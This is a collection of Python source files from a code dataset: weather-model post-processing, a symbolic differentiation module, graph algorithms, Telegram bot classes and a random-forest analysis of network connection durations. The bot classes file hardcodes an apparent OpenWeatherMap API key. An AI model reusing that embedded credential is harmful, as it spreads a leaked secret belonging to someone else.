founp.close()\n\n###################################################################################################\n###################################################################################################\n\nif __name__ == '__main__':\n\n f = open(pwd+'/process_points.config')\n cfg = yaml.load(f,yaml.Loader)\n pprint.pprint(cfg)\n\n # Check if the ww3_ounp input file exists\n if not os.path.isfile(pwd+'/ww3_ounp.inp'):\n print('ww3_ounp.inp not found')\n raise SystemExit(0)\n \n # Link the mod_def.ww3 file to the current directory\n subprocess.call(['ln','-sf',cfg['run_direc']+'mod_def.ww3',pwd])\n \n # Loop over all out_pnt.ww3.YYYYMMDD_HHMMSS-YYMMDD_HHMMSS files\n pnt_files = sorted(glob.glob(cfg['output_direc']+'out_pnt.ww3*'))\n log_files = sorted(glob.glob(cfg['log_direc']+'log.ww3*'))\n for i in range(len(pnt_files)):\n \n f = pnt_files[i]\n # Link the out_pnt.ww3 file to the current directory\n subprocess.call(['ln','-sf',f,pwd+'/out_pnt.ww3'])\n \n # Find the start and end dates from the filename\n date_range = f.split(\".\")[-1] \n start_date_time = date_range.split('-')[0]\n start_date = start_date_time.split('_')[0]\n start_time = start_date_time.split('_')[1]\n print(start_date,start_time)\n\n # Find output interval and number of outputs\n restart_output_times,gridded_output_times,point_output_times,start,end = ww3_log.find_output_times(log_files[i])\n noutputs = str(len(point_output_times))\n t0 = datetime.datetime.strptime(point_output_times[0],'%Y%m%d %H%M%S')\n t1 = datetime.datetime.strptime(point_output_times[1],'%Y%m%d %H%M%S')\n dt = t1-t0\n output_interval = int(dt.total_seconds())\n if output_interval < 3600:\n output_interval = 3600\n \n # Replace the time information line\n replace_ww3_ounp_inp_line('start date',start_date,start_time,str(output_interval),noutputs)\n\n for out_type in cfg['out_types']:\n\n otype = out_types[out_type]\n \n # Replace the output type information lines\n replace_ww3_ounp_inp_line('file prefix' ,otype['prefix'])\n replace_ww3_ounp_inp_line('output type' ,otype['type'])\n replace_ww3_ounp_inp_line('sub-type',otype['subtype'])\n \n # Run the ww3_ounp program\n subprocess.call(['srun','-n','4',pwd+'/ww3_ounp'])\n \n # Move file to data directory\n if not os.path.exists(cfg['data_direc']):\n subprocess.call(['mkdir','-p',cfg['data_direc']])\n subprocess.call('mv *.nc '+cfg['data_direc'],shell=True)\n","sub_path":"post_processing/process_points.py","file_name":"process_points.py","file_ext":"py","file_size_in_byte":3754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"88203845","text":"from functools import wraps\nimport numpy as np\nimport traceback\nfrom .constants import SIGN_LEVEL, SIGN_STR, OPERATOR, Ops\nimport itertools\nfrom collections import deque\nfrom collections import OrderedDict\nfrom abc import abstractmethod\nimport copy\n\n\nclass OperatorMetaclass(type):\n\n def __new__(cls, name, bases, attrs):\n target = ['__eq__', '__sub__', '__add__',\n '__mul__', '__truediv__', '__pow__', '__radd__', '__rsub__',\n '__rpow__', '__rtruediv__']\n\n if 'cast_other' in attrs and bases:\n cast_other = attrs['cast_other']\n for op in target:\n parents = [base.__mro__ for base in bases]\n parents = itertools.chain.from_iterable(parents)\n parent = [parent for parent in parents if parent == Operator]\n method = cast_other(getattr(parent[0], op))\n attrs[op] = method\n return type.__new__(cls, name, bases, attrs)\n\n\nclass Operator(metaclass = OperatorMetaclass):\n\n def 
__eq__(self, other):\n\n        return 'eq'\n\n    def __add__(self, other):\n\n        return 'add'\n\n    def __radd__(self, other):\n\n        return 'radd'\n\n    def __sub__(self, other):\n\n        return 'sub'\n\n    def __rsub__(self, other):\n\n        return 'rsub'\n\n    def __mul__(self, other):\n\n        return 'mul'\n\n\n    def __rmul__(self, other):\n\n        return 'rmul'\n\n    def __truediv__(self, other):\n\n        return 'div'\n\n    def __rtruediv__(self, other):\n\n        return 'rdiv'\n\n    def __pow__(self, other):\n\n        return 'pow'\n\n    def __rpow__(self, other):\n\n        return 'rpow'\n\n\n    def cast_other(func):\n        @wraps(func)\n        def wrapper(self, other):\n\n            v = func(self, other)\n\n            return v\n\n        return wrapper\n\n\nclass Base(Operator):\n\n    def __init__(self):\n        self.ops = []\n\n    def add_ops(self, op):\n\n        self.ops.append(op)\n\n    def __neg__(self):\n        expr = copy.deepcopy(self)\n        expr.add_ops('neg')\n        return expr\n\n    @abstractmethod\n    def val(self):\n\n        raise NotImplementedError\n\n\nclass Expression(Base):\n\n\n    def __init__(self, base_expression):\n\n        self.base = base_expression\n        self.vars = OrderedDict()\n        if isinstance(base_expression, Variable):\n            self.vars[str(base_expression)] = base_expression\n        elif isinstance(base_expression, Expression):\n            self.vars.update(base_expression.vars)\n\n        self.nodes = []\n\n        self.noises = OrderedDict()\n\n        super(Expression, self).__init__()\n\n\n    def append(self, atom, operator):\n        node = {'op': operator, 'atom': atom}\n        if isinstance(atom, Variable):\n            self.vars[str(atom)] = atom\n        elif isinstance(atom, Expression):\n            self.vars.update(atom.vars)\n\n        self.nodes.append(node)\n\n    @property\n    def val(self):\n\n        value = self.base.val\n\n        for index, node in enumerate(self.nodes):\n            value = OPERATOR[node['op']](value, node['atom'].val)\n\n        for op in self.ops:\n            if op == 'exp':\n                value = np.exp(value)\n            elif op == 'log':\n                value = np.log(value)\n            else:\n                value = OPERATOR[op](value)\n\n\n        return value\n\n    def gradient(self, varlist):\n\n        if not isinstance(varlist, (list, tuple)):\n            varlist = [varlist]\n\n        grads = []\n\n        for _, var in enumerate(varlist):\n            expr = self.base.gradient(var)\n\n            for op in self.ops:\n                if op == 'exp':\n                    expr = Expression(self.base)\n                    expr.add_ops('exp')\n                    expr = expr * self.base.gradient(var)\n                elif op == 'log':\n                    one = Constant('', 1)\n                    expr = (one / self.base) * self.base.gradient(var)\n                elif op == 'neg':\n                    expr = -expr\n\n            left = Expression(self.base)\n            for _, node in enumerate(self.nodes):\n                op = node['op']\n                atom = node['atom']\n\n                if op == Ops.ADD.value:\n                    expr = expr + atom.gradient(var)\n\n                elif op == Ops.SUB.value:\n\n                    expr = expr - atom.gradient(var)\n\n                elif op == Ops.MUL.value:\n                    expr = left * atom.gradient(var) + left.gradient(var) * atom\n\n                elif op == Ops.DIV.value:\n                    # quotient rule: (left' * atom - atom' * left) / atom**2\n                    expr = (left.gradient(var) * atom - atom.gradient(var) * left) / atom ** 2\n\n                elif op == Ops.POW.value:\n\n                    lg_left = Expression(left)\n                    lg_left.add_ops('log')\n\n                    gd_lg_left = atom * lg_left\n\n                    expr = left ** atom * gd_lg_left.gradient(var)\n\n                left = Expression(left)\n                left.append(atom, op)\n\n            grads.append(expr)\n\n        if len(grads) == 1:\n            return grads[0]\n        else:\n            return grads\n\n\n\n    def __repr__(self):\n\n\n        node_str = ''\n        if self.val == 0:\n            expr_str = ''\n        else:\n            expr_str = str(self.base)\n\n        for index, node in enumerate(self.nodes):\n            level = SIGN_LEVEL[node['op']]\n\n            if(isinstance(node['atom'], Expression)):\n\n                node_str = '(' + str(node['atom']) + ')'\n                if (node['atom'].val == 0):\n                    node_str = ''\n            elif(isinstance(node['atom'], 
(Parameter, Constant))):\n                node_str = str(node['atom'])\n                if node['atom'].val == 0:\n                    node_str = ''\n\n            else:\n                node_str = str(node['atom'])\n\n            if node_str and expr_str:\n                expr_str = expr_str + SIGN_STR[node['op']] + node_str\n            elif node_str:\n                expr_str = node_str\n\n        for op in self.ops:\n            if op == 'neg':\n                expr_str = SIGN_STR[op] + '(' + expr_str + ')'\n            elif op == 'exp':\n                expr_str = 'exp(' + expr_str + ')'\n            elif op == 'log':\n                expr_str = 'log(' + expr_str + ')'\n        return expr_str\n\n\n    def cast_other(func):\n\n        @wraps(func)\n        def wrapper(instance, other):\n            try:\n                op = func(instance, other)\n            except:\n                traceback.print_exc()\n\n            if op.startswith('r'):\n                if isinstance(other, (int, float)):\n                    other = Constant('Constant', other)\n                new_expr = Expression(other)\n                new_expr.append(instance, op[1:])\n            else:\n                new_expr = Expression(instance) # self is the base atom\n                if isinstance(other, (int, float)):\n                    other = Constant('Constant', other)\n                new_expr.append(other, op)\n\n            return new_expr\n\n        return wrapper\n\n\n\nclass BaseAtom(Operator):\n    def __init__(self, name, init):\n        self._shape = None\n        self._name = name\n        self._val = init\n        super(BaseAtom, self).__init__()\n\n    @property\n    def name(self):\n        return self._name\n\n    @name.setter\n    def name(self, name):\n        self._name = name\n\n    @property\n    def val(self):\n        value = self._val\n\n        return value\n\n    @val.setter\n    def val(self, value):\n\n        if(isinstance(value, (list, tuple))):\n            value = np.array(value)\n\n            self._shape = value.shape\n            self._val = value\n        else:\n            self._val = value\n\n\nclass Constant(BaseAtom):\n    '''Constant is a special kind of Atom,\n       which describes the structure of\n       the model.\n    '''\n    def __init__(self, name, val):\n        super(Constant, self).__init__(name, val)\n\n\n    def __repr__(self):\n        return str(self.val)\n\n    def gradient(self, var):\n\n        return Constant('', 0)\n\n\n    def cast_other(func):\n\n        @wraps(func)\n        def wrapper(instance, other):\n            try:\n                op = func(instance, other)\n            except:\n                traceback.print_exc()\n            if op.startswith('r'):\n                if isinstance(other, (int, float)):\n                    other = Constant('Constant', other)\n                new_expr = Expression(other)\n                new_expr.append(instance, op[1:])\n            else:\n                new_expr = Expression(instance) # self is the base atom\n                if isinstance(other, (int, float)):\n                    other = Constant('Constant', other)\n                new_expr.append(other, op)\n            return new_expr\n\n        return wrapper\n\n\nclass Atom(BaseAtom):\n\n\n    def __init__(self, name, val, order=0):\n        self._order = order\n        super(Atom, self).__init__(name, val)\n\n\n    @property\n    def order(self):\n        return self._order\n\n    @order.setter\n    def order(self, order):\n        self._order = order\n\n\n    def __str__(self):\n        if self.name is None:\n            atom_str = str(self.val)\n        elif self.order == 0:\n            atom_str = self.name\n        else:\n            atom_str = self.name + '[' + str(self.order) + ']'\n\n\n        return atom_str\n\n    def __neg__(self):\n        new_expr = Expression(self) # self is the base atom\n        new_expr.add_ops('neg')\n        return new_expr\n\n    def cast_other(func):\n\n        @wraps(func)\n        def wrapper(instance, other):\n            try:\n                op = func(instance, other)\n            except:\n                traceback.print_exc()\n\n            if op.startswith('r'):\n                if isinstance(other, (int, float)):\n                    other = Constant('Constant', other)\n                new_expr = Expression(other)\n                new_expr.append(instance, op[1:])\n            else:\n                new_expr = Expression(instance) # self is the base atom\n                if isinstance(other, (int, float)):\n                    other = Constant('Constant', other)\n                new_expr.append(other, op)\n\n            return new_expr\n\n        return wrapper\n\n\n    def gradient(self, var):\n\n        return Constant('', 0)\n\n\n\nclass 
Parameter(Atom):\n    '''Parameter is a special kind of Atom,\n       which represents the exogenous\n       elements of an expression. They\n       are un-optimizable in a model.\n    '''\n    def __init__(self, name, value):\n        super(Parameter, self).__init__(name, value)\n\nclass Variable(Atom):\n    '''Variable is a special kind of Atom,\n       which represents the endogenous\n       elements of an expression. They\n       are optimizable in a model.\n    '''\n    def __init__(self, name, init):\n        super(Variable, self).__init__(name, init)\n\n\n    def lag(self, order, init = None):\n        '''Generate a new atom that represents the lag of self by order'''\n        if(not isinstance(order, int)):\n            raise TypeError('unsupported type: '+str(type(order)))\n        if init is None:\n            init = self.val\n\n        lag_atom = copy.deepcopy(self)\n        lag_atom.val = init\n        lag_atom.order -= order\n\n        return lag_atom\n\n    def next(self, order, init = None):\n        '''Generate a new atom that represents the next of self by order'''\n        return self.lag(-order, init)\n\n    def gradient(self, var):\n        '''Overload the grad method in Operator'''\n        if var == str(self):\n\n            return Constant('', 1)\n\n        else:\n            return Constant('', 0)\n\n\n\n\n\nif __name__ == '__main__':\n\n    a = Variable('a', 3)\n    b = Atom('b', 2)\n    c = Atom('c', 5)\n    d = Constant('x', 2)\n    # m = -c - (c + b) * (a * c) * (b + c) / a\n    # there is no standalone exp() helper in this module, so build the\n    # expression first and attach the op directly\n    m = Expression(a + b)\n    m.add_ops('exp')\n\n    # x = exp(b)\n\n    # print(m.val)\n    print(m.gradient('a'))\n    print(m)\n","sub_path":"dsyspy/dsyspy/dsyspy/expression.py","file_name":"expression.py","file_ext":"py","file_size_in_byte":11730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"435707854","text":"# Python3 program to implement\n# the above approach\n\n# Function to insert vertices \n# to adjacency list\ndef insert(adj, u, v):\n\n    # Insert a vertex v to vertex u\n    adj[u].append(v)\n    return\n\n# Function to display adjacency list\ndef printList(adj, V):\n    \n    for i in range(V):\n        print(i, end = '')\n        \n        for j in adj[i]:\n            print(' --> ' + str(j), end = '')\n        \n        print()\n    \n    print()\n    \n# Function to convert adjacency\n# list to adjacency matrix\ndef convert(adj, V):\n\n    # Initialize a matrix\n    matrix = [[0 for j in range(V)] \n                 for i in range(V)]\n    \n    for i in range(V):\n        for j in adj[i]:\n            matrix[i][j] = 1\n    \n    return matrix\n\n# Function to display adjacency matrix\ndef printMatrix(adj, V):\n    \n    for i in range(V):\n        for j in range(V):\n            print(adj[i][j], end = ' ')\n        \n        print()\n    \n    print()\n    \n# Driver code\nif __name__=='__main__':\n    TI = 5\n    NS = 5\n    V = TI\n    SI = [['2', '0', 'rue-de-londres', '1'], ['0', '1', 'rue-d-amsterdam', '1'], ['3', '1', 'rue-d-athenes', '1'], ['2', '3', 'rue-de-rome', '2'], ['1', '2', 'rue-de-moscou', '3']]\n    adjList = [[] for i in range(V)]\n\n    # Inserting edges (the for loop advances i by itself)\n    for i in range(NS):\n        insert(adjList, int(SI[i][0]), int(SI[i][1]))\n    # Display adjacency list\n    print(\"Adjacency List: \")\n    printList(adjList, V)\n\n    # Function call which returns\n    # adjacency matrix after conversion\n    adjMatrix = convert(adjList, V)\n\n    # Display adjacency matrix\n    print(\"Adjacency Matrix: \")\n    printMatrix(adjMatrix, V)\n\n# This code is contributed by rutvik_56\n","sub_path":"ada.py","file_name":"ada.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"135327879","text":"from collections import deque\n\nt = int(input())\n\ndef topology_sort():\n    num_same_degree = [0] * (m+1)\n    order = [0] * (m+1)\n    que = deque()\n    ans = 0\n\n    for i in range(1,len(in_degree)):\n        # a node with in-degree 0 is a source of the river\n        
if in_degree[i] == 0:\n            que.append(i)\n            # order (Strahler number)\n            order[i] = 1\n            # number of incoming edges into i\n            num_same_degree[i] += 1\n    \n    while que:\n        cur = que.popleft()\n        # if two or more same-order edges come into cur, bump its order by 1\n        if num_same_degree[cur] >= 2:\n            order[cur] += 1\n        ans = max(ans, order[cur])\n\n        # visit the neighbor nodes connected to the current node\n        for adj in graph[cur]:\n            \n            # remove the edge going cur -> adj from the in-degree count\n            in_degree[adj] -= 1\n\n            if in_degree[adj] == 0:\n                # every edge into adj has now been examined,\n                # so push adj onto the queue to process it next\n                que.append(adj)\n            \n            # if the current node and adj have the same order, increase the same-order count\n            if order[cur] == order[adj]:\n                num_same_degree[adj] += 1\n            # otherwise keep the larger order:\n            # if adj's order is larger, num_same_degree stays as it is;\n            # if the new path cur -> adj carries a larger order, update the order\n            # and reset num_same_degree to 1\n            elif (order[adj] < order[cur]):\n                order[adj] = order[cur]\n                num_same_degree[adj] = 1\n    return ans\n\n\n\nfor T in range(t):\n    k, m, p = map(int,input().split())\n    graph = [ [] for _ in range(m+1) ]\n    in_degree = [0] * (m+1) \n    \n    for _ in range(p):\n        fr, to = map(int,input().split())\n        graph[fr].append(to)\n        in_degree[to] += 1\n    \n    max_value = topology_sort()\n    print(T+1, max_value)\n","sub_path":"3.beakjoon/jungle/practice/그래프/9470_Strahler.py","file_name":"9470_Strahler.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"336175285","text":"import peewee\r\nfrom pyowm import OWM\r\nimport datetime\r\nfrom telebot.types import ReplyKeyboardMarkup\r\n\r\ndatabase = peewee.SqliteDatabase(\"database.db\")\r\n\r\n\"\"\"\r\n\r\nClasses that describe the fields in the tables\r\n\r\n\"\"\"\r\n\r\n\r\nclass Users(peewee.Model):\r\n    id = peewee.IntegerField()\r\n    telephone = peewee.CharField()\r\n    hobbies = peewee.CharField()\r\n    first_name = peewee.CharField()\r\n    last_name = peewee.CharField()\r\n    reputation = peewee.IntegerField()\r\n    latitude = peewee.FloatField()\r\n    longitude = peewee.FloatField()\r\n    weather = peewee.IntegerField()\r\n    weather_time = peewee.TimeField()\r\n    fun = peewee.CharField()\r\n\r\n    class Meta:\r\n        database = database\r\n\r\n\r\nclass Reminder(peewee.Model):\r\n    id = peewee.IntegerField()\r\n    time = peewee.TimeField()\r\n    text = peewee.CharField()\r\n    date = peewee.DateTimeField()\r\n\r\n    class Meta:\r\n        database = database\r\n\r\n\r\nclass Events(peewee.Model):\r\n    id = peewee.IntegerField()\r\n    date = peewee.DateField()\r\n    time = peewee.TimeField()\r\n    text = peewee.CharField()\r\n    count = peewee.IntegerField()\r\n    fun = peewee.CharField()\r\n    creator = peewee.IntegerField()\r\n    members = peewee.CharField()\r\n    status = peewee.IntegerField()\r\n    address = peewee.CharField()\r\n\r\n    class Meta:\r\n        database = database\r\n\r\n\r\nclass Emoji:\r\n    \"\"\"\r\n\r\n    The Emoji class provides a readable mapping of the symbols\r\n    that change depending on the weather conditions\r\n\r\n    \"\"\"\r\n    def __init__(self):\r\n        # the Russian picture names are used as lookup keys throughout the bot\r\n        self.pictures = {\r\n            'смех': '😂',\r\n            'палец': '👍',\r\n            'солнце': '☀',\r\n            'подмигивание': '😉',\r\n            'туча1': '🌤',\r\n            'туча2': '⛅',\r\n            'туча3': '🌥',\r\n            'дождь1': '🌦',\r\n            'туча5': '☁',\r\n            'дождь2': '🌧',\r\n            'гроза1': '⛈',\r\n            'гроза2': '🌩',\r\n            'снег': '🌨',\r\n            'грусть': '😞',\r\n            'улыбка': '😀',\r\n            'улыбка1': '😊',\r\n            'пальто': '🧥',\r\n            'перчатки': '🧤',\r\n            'зонт': '☂'\r\n        }\r\n\r\n    def weather(self, text):\r\n        if text == 'Clouds':\r\n            return '☁'\r\n        elif text == 'Clear':\r\n            return '☀'\r\n        elif text == 'Snow':\r\n            return '🌨'\r\n        elif text == 'Thunderstorm':\r\n            return '⛈'\r\n        elif text == 'Drizzle':\r\n            return '🌨'\r\n        elif text == 'Rain':\r\n            return 
'🌧'\r\n        else:\r\n            return ''\r\n\r\n\r\nclass Words:\r\n    def __init__(self):\r\n        file = open('welcome_words.txt')\r\n        file1 = open('farewell_words.txt')\r\n        self.welcome = file.readlines()\r\n        self.leave = file1.readlines()\r\n\r\n\r\nclass Bot_settings:\r\n    \"\"\"\r\n\r\n    A class that holds the bot's temporary data\r\n\r\n    \"\"\"\r\n    def __init__(self):\r\n        self.action = dict()\r\n        for i in Users.select():  # initialize the action state for every user saved in the DB\r\n            self.action[i.id] = 'answer'\r\n        self.file = open('event_categories.txt')\r\n        self.lines = self.file.readlines()\r\n        self.current_shown_dates = {}\r\n        self.date = datetime.date(1, 1, 1)\r\n        self.words = Words()\r\n        self.emoji = Emoji()\r\n        self.time = ''\r\n        self.owm = OWM('ed0a22544e011704dca2f50f3399864f', language=\"ru\")\r\n        self.keyboard = ReplyKeyboardMarkup()\r\n\r\n    def weather_text(self, latitude, longitude):\r\n        \"\"\"\r\n\r\n        Fetches the weather through the API and builds the text of the message to send\r\n\r\n        \"\"\"\r\n        obs = self.owm.weather_at_coords(latitude, longitude)\r\n        w = obs.get_weather()\r\n        wind = w.get_wind()\r\n        temp = w.get_temperature(unit='celsius')\r\n        # the reply text stays in Russian, matching language=\"ru\" above\r\n        text = '☂⛅\\nСегодня {} {} \\nТемпература воздуха: {}°C\\nВетер будет достигать {} м/с\\n'.format(\r\n            w.get_detailed_status(),\r\n            self.emoji.weather(\r\n                w.get_status()),\r\n            round(temp['temp']),\r\n            round(wind['speed']))\r\n        if w.get_status() == 'Rain' and round(temp['temp']) < 0:\r\n            text += \"Рекомендую тебе взять зонтик и одеться по теплее {}{}{}\".format(self.emoji.pictures['зонт'],\r\n                                                                                    self.emoji.pictures['пальто'],\r\n                                                                                    self.emoji.pictures['перчатки'])\r\n        elif w.get_status() == 'Rain':\r\n            text += \"Рекомендую тебе взять зонтик {}\".format(self.emoji.pictures['зонт'])\r\n        elif round(temp['temp']) < 0:\r\n            text += \"Рекомендую тебе одеться по теплее {}{}\".format(self.emoji.pictures['пальто'],\r\n                                                                    self.emoji.pictures['перчатки'])\r\n        return text\r\n","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":5391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"285257661","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Oct  2 19:32:22 2017\r\n\r\n@author: Venkatesh\r\n\"\"\"\r\nimport pandas\r\nimport numpy as np\r\n#from math import sqrt \r\nfrom pandas import Series\r\nfrom sklearn.cross_validation import train_test_split \r\nfrom sklearn.ensemble import RandomForestRegressor, RandomForestClassifier \r\nfrom sklearn.tree import DecisionTreeClassifier\r\n#from sklearn.metrics import explained_variance_score, mean_absolute_error, mean_squared_error\r\n#from sklearn.utils import check_array\r\nfrom sklearn.grid_search import GridSearchCV\r\n#from sklearn.model_selection import cross_val_score\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn import preprocessing \r\nimport matplotlib.pyplot as plt\r\n\r\ndf = pandas.read_csv(\"C:/Users/user/Desktop/Drchen/Cap8/capsule8.csv\")\r\ndf1 = pandas.read_excel(\"C:/Users/user/Desktop/Drchen/Cap8/cap8.xlsx\")\r\ndf2 = pandas.read_excel(\"C:/Users/user/Desktop/Drchen/Cap8/tcp_life.xlsx\")\r\n\r\nx = Series.from_array(df['ts'])\r\ny = Series.from_array(df['depth'])\r\n#binwidth = 200\r\n\r\n# 1. time-series & histogram for ts\r\nx.hist()\r\nx.plot()\r\n\r\n# time-series & histogram for depth\r\ny.hist()\r\nplt.plot(x,y)\r\n\r\nplot_1 = plt.plot(df['ts'])\r\nplot_2 = plt.plot(df['ts'],df['depth'])\r\n\r\n# time-series & histogram for rate_1 & rate_5\r\ndf1['rate_1']=np.nan\r\ndf1['rate_5']=np.nan\r\nfor i in 
range(0, len(df1['rates'])):\r\n    for j in eval(df1['rates'][i]):\r\n        if j == '1': \r\n            df1['rate_1'][i] = (eval(df1['rates'][i])[j])\r\n        else:\r\n            df1['rate_5'][i] = (eval(df1['rates'][i])[j])\r\n\r\nplot_3 = plt.plot(df1['ts'],df1['rate_1'])\r\nplot_4 = plt.plot(df1['ts'],df1['rate_5'])\r\n\r\ndf1['rate_1'].hist()\r\ndf1['rate_5'].hist()\r\n\r\n# 3. time-series & histogram for rx and tx\r\nplot_5 = plt.plot(df2['ts'],df2['rx'])\r\nplot_6 = plt.plot(df2['ts'],df2['tx']) \r\n\r\ndf2['rx'].hist()\r\ndf2['tx'].hist()\r\n\r\n# time-series & histogram for dur\r\nplot_7 = plt.plot(df2['ts'],df2['dur'])\r\ndf2['dur'].hist()\r\n#df2['dur'].hist(bins=np.arange(min(df2['dur']), max(df2['dur']) + binwidth, binwidth))\r\n\r\n# time-series & histogram for lport & rport\r\nplot_8 = plt.plot(df2['ts'],df2['lport'])\r\nplot_9 = plt.plot(df2['ts'],df2['rport'])\r\n\r\ndf2['lport'].hist()\r\ndf2['rport'].hist()\r\n\r\nSeries.from_array(df2['dur']).plot(kind='kde')\r\n#plot_10 = plt.vlines(df2['dur'].mean(),ymin=0,ymax=0.0025,linewidth=2.0)\r\n#plot_11 = plt.vlines(df2['dur'].median(),ymin=0,ymax=0.0025,linewidth=2.0,color=\"red\")\r\n\r\ndf3 = pandas.read_csv(\"C:/Users/user/Desktop/Drchen/Cap8/dur1.csv\")\r\ndf4 = pandas.read_csv(\"C:/Users/user/Desktop/Drchen/Cap8/dur2.csv\")\r\ndf5 = pandas.read_csv(\"C:/Users/user/Desktop/Drchen/Cap8/dur3.csv\")\r\n\r\n#df3['dur1'].hist(bins=np.arange(min(df3['dur1']), max(df3['dur1']) + binwidth, binwidth))\r\ndf3['dur1'].hist()\r\ndf4['dur2'].hist()\r\ndf5['dur3'].hist()\r\n\r\n\r\ndf2['dur'].describe()\r\n\r\n# quartile values taken from the describe() output above\r\nupper = 226.797500\r\nlower = 85.512500\r\nIQ = upper - lower\r\n\r\nlower_inner_fence = lower - 1.5*(IQ)\r\nupper_inner_fence = upper + 1.5*(IQ)\r\nlower_outer_fence = lower - 3.0*(IQ)\r\nupper_outer_fence = upper + 3.0*(IQ)\r\n\r\n\r\ndf2['dur'].plot.box(vert = False)\r\nplt.show()\r\n\r\n\r\n# Data Modelling \r\ndf2['443'] = np.nan  # extracting values of histoports 443 & 80\r\ndf2['80'] = np.nan\r\nfor i in range(0, len(df2['histoports'])):\r\n    x = eval(df2['histoports'][i])\r\n    x = x[1]\r\n    df2['443'][i] = x['443']\r\n    df2['80'][i] = x['80']\r\n\r\ndf2.to_csv('model.csv', encoding='utf-8') \r\n\r\nmodel_dataset = pandas.read_csv(\"C:/Users/user/Desktop/Drchen/Cap8/model.csv\")\r\nmodel_dataset['rport'] = model_dataset['rport'].astype(str)\r\nmodel_dataset['lport'] = model_dataset['lport'].astype(str)\r\nmodel_dataset['predquality'] = model_dataset['predquality'].astype(str)\r\n\r\nrandom_forest_model = RandomForestRegressor(random_state=0)\r\nX = model_dataset.iloc[:,1:9]\r\nY = model_dataset.iloc[:,0]\r\n\r\nX_train, X_test, Y_train, Y_test = train_test_split( X, Y, test_size = 0.3)\r\n\r\n\r\nparam_grid = {'n_estimators': [17, 18, 19, 20, 22, 23, 25], \r\n              'max_depth': [10, 11, 12, 13, 14, 15], \r\n              }\r\n\r\ngrid_clf = GridSearchCV(random_forest_model, param_grid, cv = 10)\r\ngrid_clf1 = GridSearchCV(random_forest_model, param_grid, cv = 5)\r\ngrid_clf2 = GridSearchCV(random_forest_model, param_grid, cv = 3)\r\n\r\n# mean absolute percentage error; the denominator must be the actual values\r\ndef mape(y_true, y_pred):\r\n    return np.mean(np.abs((y_true - y_pred) / y_true)) * 100\r\n    \r\ngrid_clf.fit(X_train, Y_train)  # fitting training on 10 fold gridCV\r\ngrid_clf.best_estimator_\r\ngrid_clf.best_params_\r\ngrid_clf.best_score_\r\n\r\ngrid_clf.score(X_train, Y_train)\r\ngrid_clf.score(X_test, Y_test)\r\n\r\n\r\ntemp2 = grid_clf.predict(X_train)  # predicting in-sample for 10 fold gridCV \r\ntemp = grid_clf.predict(X_test)  # predicting out-sample for 10 fold gridCV\r\nmape(Y_train.values, temp2)\r\nmape(Y_test.values, temp)\r\n\r\n#insample 
plot\r\nfig, ax = plt.subplots()\r\nax.scatter(Y_train, temp2, edgecolors=(0, 0, 0))\r\nax.plot([Y_train.min(), Y_train.max()], [Y_train.min(), Y_train.max()], 'k--', lw=1)\r\nax.set_xlabel('Actual')\r\nax.set_ylabel('Predicted')\r\nplt.show()\r\n\r\n#outsample plot\r\nfig, ax = plt.subplots()\r\nax.scatter(Y_test, temp, edgecolors=(0, 0, 0))\r\nax.plot([Y_test.min(), Y_test.max()], [Y_test.min(), Y_test.max()], 'k--', lw=1)\r\nax.set_xlabel('Actual')\r\nax.set_ylabel('Predicted')\r\nplt.show()\r\n\r\n\r\ngrid_clf1.fit(X_train, Y_train) #fitting training on 5 fold gridCV\r\ngrid_clf1.best_estimator_\r\ngrid_clf1.best_params_\r\ngrid_clf1.best_score_\r\n\r\ngrid_clf1.score(X_train, Y_train)\r\ngrid_clf1.score(X_test, Y_test)\r\n\r\ntemp3 = grid_clf1.predict(X_train)\r\ntemp1 =grid_clf1.predict(X_test)\r\nmape(Y_train.values, temp3)\r\nmape(Y_test.values, temp1)\r\n\r\n#insample plot\r\nfig, ax = plt.subplots()\r\nax.scatter(Y_train, temp3, edgecolors=(0, 0, 0))\r\nax.plot([Y_train.min(), Y_train.max()], [Y_train.min(), Y_train.max()], 'k--', lw=1)\r\nax.set_xlabel('Actual')\r\nax.set_ylabel('Predicted')\r\nplt.show()\r\n\r\n#outsample plot\r\nfig, ax = plt.subplots()\r\nax.scatter(Y_test, temp1, edgecolors=(0, 0, 0))\r\nax.plot([Y_test.min(), Y_test.max()], [Y_test.min(), Y_test.max()], 'k--', lw=1)\r\nax.set_xlabel('Actual')\r\nax.set_ylabel('Predicted')\r\nplt.show()\r\n\r\n\r\n\r\ngrid_clf2.fit(X_train, Y_train) #fitting training on 3 fold gridCV\r\ngrid_clf2.best_estimator_\r\ngrid_clf2.best_params_\r\ngrid_clf2.best_score_\r\n\r\ngrid_clf2.score(X_train, Y_train)\r\ngrid_clf2.score(X_test, Y_test)\r\n\r\ntemp5 = grid_clf2.predict(X_train)\r\ntemp4 =grid_clf2.predict(X_test)\r\nmape(Y_train.values, temp5)\r\nmape(Y_test.values, temp4)\r\n\r\n#insample plot\r\nfig, ax = plt.subplots()\r\nax.scatter(Y_train, temp5, edgecolors=(0, 0, 0))\r\nax.plot([Y_train.min(), Y_train.max()], [Y_train.min(), Y_train.max()], 'k--', lw=1)\r\nax.set_xlabel('Actual')\r\nax.set_ylabel('Predicted')\r\nplt.show()\r\n\r\n#outsample plot\r\nfig, ax = plt.subplots()\r\nax.scatter(Y_test, temp4, edgecolors=(0, 0, 0))\r\nax.plot([Y_test.min(), Y_test.max()], [Y_test.min(), Y_test.max()], 'k--', lw=1)\r\nax.set_xlabel('Actual')\r\nax.set_ylabel('Predicted')\r\nplt.show()\r\n\r\n''' some other stuffs that i tried\r\npca = PCA(n_components=2)\r\npca1 = PCA(n_components=3)\r\npca2 = PCA(n_components=4)\r\n\r\nstandardized_X = 